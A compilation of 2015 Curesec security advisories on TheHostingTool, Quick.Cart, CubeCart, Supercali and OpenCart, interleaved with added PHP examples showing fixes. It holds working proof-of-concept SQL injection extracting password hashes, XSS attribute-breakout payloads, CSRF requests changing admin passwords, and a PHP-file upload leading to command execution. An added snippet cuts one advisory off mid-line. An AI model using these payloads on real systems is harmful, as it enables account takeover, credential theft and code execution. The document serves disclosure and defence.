There are three SQL Injections in the admin area of TheHostingTool 1.2.6. The problem is that the defense against SQL Injection depends in part on the global GET and POST variables being sanitized using mysql_real_escape_string if accessed via postvar or getvar. This makes them relatively safe to use in a query if the parameter is surrounded by quotes. But for places where the parameter is not surrounded by quotes, this will not prevent SQL injection. Please note that admin credentials are required for all SQL injections shown here.

3. Details

SQL Injection 1
The POST value "type" is used as the column name in a WHERE clause when using the ajax search. Encoding single quotes does not prevent SQL injection in this case. It should also be noted that letting the user choose the column of a LIKE query on a user table is not a good idea in general, as it will be easy to iterate passwords this way.

Proof of Concept:
POST http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=search
type=user` %3D 1 union all select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tht_users %23&value=test

Code:
includes/ajax.php

    public function search() {
        global $main, $db, $style;
        if($_SESSION['logged']) {
            //echo '
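An added example, not TheHostingTool code, of why quote escaping does nothing for a value used as a column name, beside a fixed list of searchable columns with the search term bound as a parameter; the escape helper standing in for mysql_real_escape_string and the input are constructed, so no database is needed:

```php
<?php
// Added example (not TheHostingTool code): an escaped value used as an SQL
// identifier, beside an allowlisted column plus a bound parameter. The escape
// helper is a constructed stand-in for mysql_real_escape_string so the script
// runs without a database; the input mirrors the shape of the advisory's PoC.

// Escapes the same characters mysql_real_escape_string does. Backticks are not
// among them, so a value placed between backticks is not protected.
function escape_like_mysql(string $v): string
{
    return addcslashes($v, "\x00\n\r\\'\"\x1a");
}

// Vulnerable pattern: escaping is applied, but "type" lands in identifier
// position where no quote character delimits it.
function vulnerable_search_sql(string $type, string $value): string
{
    $type  = escape_like_mysql($type);
    $value = escape_like_mysql($value);
    return "SELECT * FROM tht_users WHERE `{$type}` LIKE '%{$value}%'";
}

// Hardened pattern: the column must be one of a fixed set (constructed list),
// and the search term is passed as a placeholder for a prepared statement.
// Note that "password" is deliberately not searchable.
const SEARCHABLE_COLUMNS = ['user', 'email', 'id'];

function safe_search_sql(string $type, string $value): array
{
    if (!in_array($type, SEARCHABLE_COLUMNS, true)) {
        throw new InvalidArgumentException('unsupported search column');
    }
    return [
        'sql'    => "SELECT * FROM tht_users WHERE `{$type}` LIKE :value",
        'params' => [':value' => '%' . $value . '%'],
    ];
}

// Constructed "type" value: closes the backtick-quoted identifier and appends
// more SQL without using a single quote, so escaping has nothing to act on.
$type = "user` = 1 UNION ALL SELECT 1,password,3 FROM tht_users #";

echo "escaped only : ", vulnerable_search_sql($type, 'test'), "\n";

try {
    safe_search_sql($type, 'test');
} catch (InvalidArgumentException $e) {
    echo "allowlisted  : rejected (", $e->getMessage(), ")\n";
}

echo "allowlisted  : ";
print_r(safe_search_sql('user', 'test'));
```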
[FD] TheHostingTool 1.2.6: Code Execution
Security Advisory - Curesec Research Team

1. Introduction
Affected Product: TheHostingTool 1.2.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: https://thehostingtool.com/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Description
Themes can be uploaded via a zip file by an admin. The uploader checks the validity of each file with a blacklist. The blacklist misses at least two file types that will lead to code execution: any file with the extension .pht - which will be executed by most default Apache configurations - and the .htaccess file - which, if parsed by the server, will allow code execution with files with arbitrary extensions. It is recommended to use a whitelist instead of a blacklist. Please note that admin credentials are required to exploit this issue.

3. Code
lof.php

    if(preg_match('/^.+\.((?:php[3-5]?)|(?:cgi)|(?:pl)|(?:phtml))$/i', basename($stat['name']), $regs2)) {
        $errors[] = strtoupper($regs2[1]) . ' is not a valid file type in a theme zip.';
        $insecureZip = true;
        break;
    }

4. Solution
This issue has not been fixed.

5. Report Timeline
09/07/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/TheHostingTool-126-Code-Execution-75.html
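An added example, not TheHostingTool code, running the advisory's blacklist regex and a whitelist check over the same constructed file names; the whitelisted extension list is an assumption about what a theme legitimately contains, and the same whitelist approach applies to the image and language-file uploads described in the TomatoCart, X-Cart and CubeCart advisories on this page:

```php
<?php
// Added example (not TheHostingTool code): the blacklist regex quoted in the
// advisory beside a whitelist check. The extension list and the sample file
// names are constructed for this demonstration.

// Blacklist exactly as quoted: true when the name ends in a listed extension.
function blacklist_rejects(string $name): bool
{
    return preg_match('/^.+\.((?:php[3-5]?)|(?:cgi)|(?:pl)|(?:phtml))$/i', basename($name)) === 1;
}

// Whitelist: only extensions a theme needs (assumed list). Dotfiles such as
// .htaccess are rejected before the extension is even looked at, and the
// comparison is on the final extension, lower-cased.
const THEME_EXTENSIONS = ['css', 'js', 'png', 'jpg', 'jpeg', 'gif', 'svg', 'html', 'tpl', 'txt'];

function whitelist_accepts(string $name): bool
{
    $base = basename($name);
    if ($base === '' || $base[0] === '.') {
        return false;                                   // .htaccess, .user.ini, ...
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    return $ext !== '' && in_array($ext, THEME_EXTENSIONS, true);
}

// Constructed zip entries covering the cases the advisory describes.
$samples = [
    'mytheme/style.css',
    'mytheme/index.php',      // listed extension: both checks reject
    'mytheme/index.pht',      // not on the blacklist
    'mytheme/.htaccess',      // no extension in the regex's sense
    'mytheme/index.PhTmL',    // case-insensitive flag covers this one
    'mytheme/logo.png',
];

printf("%-22s %-10s %s\n", 'entry', 'blacklist', 'whitelist');
foreach ($samples as $entry) {
    printf("%-22s %-10s %s\n", $entry,
        blacklist_rejects($entry) ? 'reject' : 'ALLOW',
        whitelist_accepts($entry) ? 'allow' : 'REJECT');
}
```

A whitelist still has to be paired with a web server configuration that never executes files from the upload directory, since a server-side handler, not the extension list, decides what runs.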
[FD] Quick.Cart 6.6: Multiple XSS
Security Advisory - Curesec Research Team

1. Introduction
Affected Product: Quick.Cart 6.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: i...@opensolution.org
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 10/07/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Description
Quick.Cart 6.6 is vulnerable to multiple reflected XSS attacks. With this, it is possible to inject JavaScript keyloggers or perform phishing attacks.

The vulnerabilities are all in the admin.php file. To add security through obscurity, Quick.Cart does suggest to rename this file, which would make it more difficult to exploit these vulnerabilities. The renaming is not mandatory.

The vulnerabilities detailed below depend on the fact that the main entry points for users and admins contain a call to extract:

index.php

    extract( $_GET );

admin.php

    extract( $_GET );

With this, it is possible to overwrite or set any variable. Because of this, it is not considered best-practice to pass user input to extract. The SESSION variable can not be set by an attacker, because session_start is called after extract, but variables such as SERVER or COOKIE and undefined variables can be set. This call also makes it possible to send POST requests via GET, making the exploitation of for example CSRF easier. It may have further negative effects as well.

3. Details

XSS 1
Proof of Concept:
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iStatus=">alert(1)
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iProducts=">alert('xss')

Code:
templates/admin/orders.php

XSS 2
Proof of Concept:
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=lang-translations&sLanguage=alert(1)

Code:
templates/admin/languages.php

XSS 3
Proof of Concept:
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_COOKIE[sLogin]=" autofocus onfocus="alert('xss')

Code:
common-admin.php

    $content = ' AddOnload( cursor ); '.$lang['Login'].':'.$lang['Password'].':';

XSS 4
Proof of Concept:
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_SERVER[HTTP_HOST]=">alert(1)&_SERVER[SCRIPT_FILENAME]=/var/www/ecommerce/Quick.Cart_v6.6/admin.php

Please note that the SCRIPT_FILENAME must be set correctly, as it's used as the name of the session key and overwriting one SERVER value leads to the deletion of all other SERVER values.

Code:
core/libraries/trash.php

    $GLOBALS['lang']['Language'] .= 'http://opensolution.org/news,.html?sUrl='.$_SERVER['HTTP_HOST'].'" style="display:none;">';

4. Solution
This issue was not fixed by the vendor.

5. Report Timeline
09/07/2015 Informed Vendor about Issue
10/01/2015 Reminded Vendor of release date
10/01/2015 Vendor does not plan on releasing a fix, because the optional rename of the admin file may mitigate this issue already
10/07/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/QuickCart-66-Multiple-XSS-74.html
[FD] Quick.Cart 6.6: CSRF
Security Advisory - Curesec Research Team

1. Introduction
Affected Product: Quick.Cart 6.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: i...@opensolution.org
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Description
None of the requests of Quick.Cart 6.6 are protected from CSRF. This means that an attacker can perform actions for a logged-in user by getting them to visit a website with specifically crafted HTML and JavaScript while logged in.

The interesting forms are all in the admin.php file. To add security through obscurity, Quick.Cart does suggest to rename this file, which would make it more difficult to exploit these vulnerabilities. The renaming is not mandatory.

The vulnerability can be exploited via GET or POST because of a call to extract:

    extract( $_GET );

3. Proof of Concept
Change Admin Password:

    http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=tools-config" method="POST">
    document.createElement('form').submit.call(document.getElementById('myform'));

Or via GET:
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=tools-config&_POST[sOption]=save%20%26raquo%3B&_POST[login]=admin&_POST[pass]=123&_POST[submit]=Submit%20request

4. Solution
This issue was not fixed by the vendor.

5. Report Timeline
09/07/2015 Informed Vendor about Issue
10/01/2015 Reminded Vendor of release date
10/01/2015 Vendor does not plan on releasing a fix, because the optional rename of the admin file may mitigate this issue already
10/07/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/QuickCart-66-CSRF-73.html
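An added example, not Quick.Cart code, showing what the extract($_GET) call discussed in this and the preceding Quick.Cart XSS advisory does to the request environment, beside an allowlisted way of reading the same parameters; $_GET is constructed inline in the shape of the PoC URLs so the script runs from the command line, and the page-name list is an assumption:

```php
<?php
// Added example (not Quick.Cart code): extract($_GET) at the top of an entry
// script, beside allowlisted parameter handling. $_GET is constructed inline
// so this runs from the CLI; the page names are an assumed list.

// Constructed query string in the shape of the advisory's PoCs: it smuggles a
// fake POST body and a replacement $_SERVER array through GET.
$_GET = [
    'p'       => 'tools-config',
    '_POST'   => ['login' => 'admin', 'pass' => '123'],
    '_SERVER' => ['HTTP_HOST' => 'value-from-query-string'],
];

// Allowlisted handling: read only the keys this page expects, each from the
// request part it belongs to, and validate free text against a fixed list
// instead of passing it through.
function read_admin_request(array $get, array $post): array
{
    static $pages = ['main', 'orders-list', 'lang-translations', 'tools-config'];
    $page = $get['p'] ?? 'main';
    if (!in_array($page, $pages, true)) {
        $page = 'main';
    }
    return [
        'page'  => $page,
        'login' => $post['login'] ?? null,        // credentials only from the real POST body
        'host'  => $_SERVER['HTTP_HOST'] ?? '(unset)',
    ];
}

// Evaluated first, so it sees the untouched superglobals.
echo "allowlisted handling:\n";
print_r(read_admin_request($_GET, $_POST));

// Quick.Cart's pattern: every query-string key becomes a variable in the global
// scope. Keys named _POST, _SERVER or _COOKIE replace those arrays wholesale,
// which is why the advisory notes that overwriting one $_SERVER value deletes
// all the others.
extract($_GET);

echo "after extract(\$_GET):\n";
print_r([
    'post_login' => $_POST['login'] ?? null,        // populated without any POST body
    'host'       => $_SERVER['HTTP_HOST'] ?? '(unset)',
    'page'       => $p ?? null,                      // $p sprang into existence from the query
]);
```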
[FD] CubeCart 6.0.7: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: CubeCart 6.0.7
Fixed in: 6.0.8
Fixed Version Link: https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip
Vendor Contact: sa...@cubecart.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 10/07/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Reflected XSS

Description

The search echoes a keyword it retrieves via GET inside HTML tags. It removes HTML tags from the keyword, but it does not encode quotes, which makes it possible to break out of the context of the current attribute and add new attributes. An attacker can use attributes such as onmouseover to execute JavaScript.

To execute the code, the victim needs to hover over the title image, which an attacker may for example achieve via clickjacking.

Proof of Concept

http://localhost/ecommerce/CubeCart-6.0.6/search.html?search[keywords]="; onmouseover="alert('xsstest')" foo="&_a=category

3. Persistent XSS

Description

The page to edit user-submitted reviews echoes user input inside HTML input tags without encoding quotes, which makes it possible to break out of the context of the current attribute and add new attributes. An attacker can use attributes such as onfocus to execute JavaScript. In combination with autofocus, a victim does not need to actually interact with the input field for the code to execute.

Proof of Concept

1. Write a review here: http://localhost/ecommerce/CubeCart-6.0.6/test-category/test-product.html#reviews_write
2. Use as name or title: " autofocus onfocus="alert(1)" foo="
3. Visit the review-edit site: http://localhost/ecommerce/CubeCart-6.0.6/admin.php?_g=products&node=reviews&edit=REVIEWID

4. Solution

To mitigate this issue please upgrade at least to version 6.0.8:
https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip

Please note that a newer version might already be available.

5. Report Timeline

09/07/2015 Informed Vendor about Issue
10/05/2015 Vendor releases fix
10/07/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/CubeCart-607-XSS-71.html
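Both findings in the advisory above share one root cause, tags stripped but quotes left intact inside an attribute. The added example below (not CubeCart's code, and not from the Curesec post) shows that rendering beside the attribute-context encoding that closes it; the template snippets for the title image and the review-edit input are assumptions.

```php
<?php
// Added example, not CubeCart's code: why strip_tags() alone leaves the
// attribute context open, and the encoding that closes it. The two template
// snippets are assumptions standing in for the search title image and the
// review-edit input field named in the advisory.

// Vulnerable rendering as described: tags are removed, but a double quote
// survives, so the value can end the title attribute and start new ones.
function renderTitleVulnerable(string $keyword): string
{
    return '<img src="title.png" title="' . strip_tags($keyword) . '">';
}

// Hardened rendering: encode for the HTML attribute context. ENT_QUOTES turns
// both " and ' into entities, so the value can never close the attribute.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderTitleSafe(string $keyword): string
{
    return '<img src="title.png" title="' . attr($keyword) . '">';
}

function renderReviewInputSafe(string $name): string
{
    return '<input type="text" name="name" value="' . attr($name) . '">';
}

// Constructed inputs modelled on the advisory's two payloads.
$hover = '" onmouseover="alert(1)" foo="';
$focus = '" autofocus onfocus="alert(1)" foo="';

// strip_tags() sees no '<' here and returns the string unchanged, so the
// leading quote terminates title="" and onmouseover becomes a real attribute.
echo renderTitleVulnerable($hover), "\n";
// With attr() every quote is an entity; the browser shows the payload as the
// literal title text and no new attribute is created.
echo renderTitleSafe($hover), "\n";
// Same for the review form: autofocus/onfocus stay inside the value string.
echo renderReviewInputSafe($focus), "\n";
```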
[FD] CubeCart 6.0.7: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: CubeCart 6.0.7
Fixed in: 6.0.8
Fixed Version Link: https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip
Vendor Contact: sa...@cubecart.com
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/07/2015
Disclosed to public: 10/07/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

When importing a language from a language file, it is only checked that the file contains valid XML, but the original extension of the file is kept, which makes it possible to gain code execution by uploading a file containing PHP code.

Please note that admin credentials are required.

3. Proof of Concept

Create a language file with valid XML and a file name like en.php with PHP code inside:

My Language utf-8 1.0.0 5.0.0a 5.1.* GBP ltr

Upload the file here:

http://localhost/ecommerce/CubeCart-6.0.6/admin.php?_g=settings&node=language#lang_import

And visit it to execute the code:

http://localhost/ecommerce/CubeCart-6.0.6/language/en.php?x=ls%20-alF

4. Solution

To mitigate this issue please upgrade at least to version 6.0.8:
https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip

Please note that a newer version might already be available.

5. Report Timeline

09/07/2015 Informed Vendor about Issue
10/05/2015 Vendor releases fix
10/07/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/CubeCart-607-Code-Execution-70.html
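The defect above is that the parse check and the stored filename are independent: the XML is validated, but the client's extension is kept. An added example (not CubeCart's code, and not from the Curesec post) shows an import routine that derives the stored name from the validated document and always writes .xml; the <language code="..."> root layout, the $langDir location and the $_FILES['lang'] field are assumptions.

```php
<?php
// Added example, not CubeCart's code: a language-file import that never
// reuses the uploaded file's name or extension. The <language code=".."> root
// layout, the $langDir location and the upload field name are assumptions.

function importLanguageFile(string $tmpPath, string $langDir): string
{
    if (!is_uploaded_file($tmpPath)) {
        throw new RuntimeException('not an uploaded file');
    }
    $raw = file_get_contents($tmpPath);
    if ($raw === false) {
        throw new RuntimeException('cannot read upload');
    }
    // Entity declarations have no place in a language file; refusing them
    // also keeps XXE out before the parser ever sees a DOCTYPE.
    if (stripos($raw, '<!DOCTYPE') !== false || stripos($raw, '<!ENTITY') !== false) {
        throw new RuntimeException('DOCTYPE/ENTITY not allowed');
    }
    $prev = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $ok = $doc->loadXML($raw, LIBXML_NONET);   // no network fetches
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    $root = $doc->documentElement;
    if (!$ok || $root === null || $root->tagName !== 'language') {
        throw new RuntimeException('not a language file');
    }
    // The stored name comes from a validated attribute, never from the client.
    $code = $root->getAttribute('code');
    if (!preg_match('/^[a-z]{2}(-[A-Z]{2})?$/', $code)) {
        throw new RuntimeException('invalid language code');
    }
    $dest = rtrim($langDir, '/') . '/' . $code . '.xml';
    // Write the re-serialised DOM, not the raw upload, and always as .xml:
    // whatever the body contains, a .xml file is served as data, not handed
    // to the PHP interpreter the way language/en.php was.
    if (file_put_contents($dest, $doc->saveXML()) === false) {
        throw new RuntimeException('cannot write language file');
    }
    return $dest;
}

// Typical call from the admin upload handler ($_FILES['lang'] is assumed):
// $path = importLanguageFile($_FILES['lang']['tmp_name'], __DIR__ . '/language');
```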
[FD] Supercali Event Calendar 1.0.8: XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Supercali Event Calendar 1.0.8
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://supercali.inforest.com/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

There is an XSS vulnerability via the "id" GET parameter when editing a group in Supercali Event Calendar 1.0.8. With this, it is possible to steal cookies or inject JavaScript keyloggers.

3. Proof of Concept

http://supercali-1.0.8/supercali-1.0.8/edit_groups.php?mode=edit_group&id=alert('xss')

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
10/07/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/Supercali-Event-Calendar-108-XSS-69.html
[FD] Supercali Event Calendar 1.0.8: CSRF
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Supercali Event Calendar 1.0.8
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://supercali.inforest.com/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

None of the forms of Supercali Event Calendar 1.0.8 have CSRF protection, which means that an attacker can perform actions for the victim if the victim visits an attacker-controlled site while logged in.

3. Proof of Concept

Add a User:

http://localhost/supercali-1.0.8/supercali-1.0.8/admin_actions.php"; method="POST">
document.myform.submit();

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
10/07/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/Supercali-Event-Calendar-108-CSRF-68.html
[FD] OpenCart 2.0.3.1: CSRF
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: OpenCart 2.0.3.1
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: https://www.opencart.com/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

While CSRF protection exists for the actions of an admin, it does not exist for customers. This means that customer accounts can be compromised by an attacker if the victim visits an attacker-controlled website while logged in.

This issue was already discovered in 2013 by Saadat Ullah, but new versions of OpenCart are still vulnerable as no fix has been released.

3. Proof of Concept

Change Password:

http://localhost/opencart-2.0.3.1/upload/index.php?route=account/password"; >
document.myform.submit();

Change profile information, including email address, which is used when logging in:

http://localhost/opencart-2.0.3.1/upload/index.php?route=account/edit"; >
document.myform.submit();

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/23/2015 Vendor points out that issue is already known, and that they do not plan on releasing a fix
10/07/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/OpenCart-2031-CSRF-66.html